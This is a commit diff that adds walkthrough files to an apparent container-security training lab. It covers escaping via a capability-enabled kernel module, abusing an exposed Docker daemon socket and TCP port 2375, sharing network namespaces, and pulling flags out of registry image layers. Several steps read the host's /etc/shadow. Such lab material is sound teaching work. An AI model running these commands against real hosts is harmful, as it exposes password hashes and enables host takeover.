Adds slides and brief walkthrough

Author: Mohit Gupta

roles/capabilities/files/walkthrough.txt

@@ -0,0 +1,24 @@
+1) Get the container id for the kernel container so we can add files:
+
+docker ps | grep kernel
+
+The container id will be the first field
+
+2) Tweak exploit.c by replacing '/bin/echo foo > /bar' with '/bin/cp /etc/shadow /tmp/'
+
+3) Copy over exploit.c and Makefile to the container
+
+docker cp exploit.c <container id>:/
+docker cp Makefile <container id>:/
+
+4) Exec into the container
+
+docker-compose exec kernel bash
+
+5) Compile module
+
+make
+
+6) Load module
+
+insmod exploit.ko

roles/daemon/files/walkthrough.txt

@@ -0,0 +1,19 @@
+1) Exec into the backdoor container
+
+docker-compose exec backdoor sh
+
+2) Access the daemon within the UNIX socket in / and list running containers
+
+docker -H unix:///docker.sock ps
+
+3) Obtain the IP address of the containers gateway (the host)
+
+route -n
+
+4) Access the daemon through the host on TCP 2375
+
+docker -H tcp://<host ip>:2375 ps
+
+5) Print /etc/shadow from the host
+
+docker -H unix:///docker.sock run --rm -v /etc:/host/ ubuntu cat /host/shadow

roles/networking/files/walkthrough.txt

@@ -0,0 +1,21 @@
+1) Spawn an initial container
+
+docker run --rm -ti skybound/net-utils bash
+
+2) In a _separate_ terminal, obtain the container id of the container created within step 1
+
+docker ps
+
+3) Spawn a second container that attaches onto the network stack of the first container
+
+docker run --rm -ti --net container:<container id> skybound/net-utils bash
+
+4) Spawn a netcat listener in the first container
+
+nc -nlvp 8080
+
+5) Connect to the listening netcat from the second container
+
+nc -v localhost 8080
+
+6) Type random gibberish and press enter in both terminals, and validate the data appears in the other terminal

roles/registry/files/walkthrough.txt

@@ -0,0 +1,28 @@
+1) List available tags
+
+reg ls -f localhost:5000
+
+2) Obtain the manifest of the first image and get the digest of the config
+
+reg manifest -f localhost:5000/supersecretimage:v1
+
+3) Download the config and observe that a file was added to /lib/udev/docker.txt within the last layer
+
+reg layer -f localhost:5000/supersecretimage@<config digest from manifest> | jq
+
+4) Get the digest of the bottom layer from the manifest
+
+5) Download the bottom layer
+
+reg layer -f localhost:5000/supersecretimage@<layer digest from manifest> > layer.tar.gz
+
+6) Extract layer and cat lib/udev/docker.txt
+
+tar zxvf layer.tar.gz && cat lib/udev/docker.txt
+
+
+7) For the second image, the same steps can be followed to get to the config which contains the flag
+
+8) For the final flag, the config shows a file was added in the second to last layer and then deleted in the final, as such obtain the digest of the second from bottom layer from the manifest
+
+9) Download the layer as before, extract and view the contents of bin/something.txt